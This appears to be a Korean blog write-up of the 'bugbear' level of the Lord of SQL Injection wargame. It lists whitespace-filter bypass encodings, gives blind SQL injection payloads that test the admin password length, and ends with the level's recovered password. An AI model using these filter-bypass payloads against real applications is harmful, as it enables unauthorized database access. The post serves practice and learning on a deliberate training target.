관리 메뉴

Information Security

[LOS] 13. bugbear 본문

WarGame/Lord of SQL Injection

[LOS] 13. bugbear

HackingPractice 2020. 8. 8. 12:27

그림 13-1 문제

빈칸 공백 우회 '' : (), /**/, %09, %0a, %0c, %0b, +

no=1%0a||%0aid%0ain%0a("admin") 입력 시 Hello admin이 출력되는 것을 알 수 있다.

그림 13-2 admin

no=1%0a||%0aid%0ain%0a("admin")%0a%26%26%0alength(pw)%0ain%0a(8) 입력 시 Hello admin이 출력되는 것을 알 수 있다. 

그림 13-3 true

no=1%0a||%0aid%0ain%0a("admin")%0a%26%26%0alength(pw)%0ain%0a(6) 입력 시 메시지가 출력되지 않았다.

그림 13-4 false
그림 13-5 소스코드

?pw=735c2773 값이라는 것을 알 수 있다.

그림 1-6 정답

'WarGame > Lord of SQL Injection' 카테고리의 다른 글

[LOS] 15. assassin  (0) 2020.08.08
[LOS] 14. giant  (0) 2020.08.08
[LOS] 12. darkknight  (0) 2020.08.08
[LOS] 11. golem  (0) 2020.08.08
[LOS] 10. skeleton  (0) 2020.02.19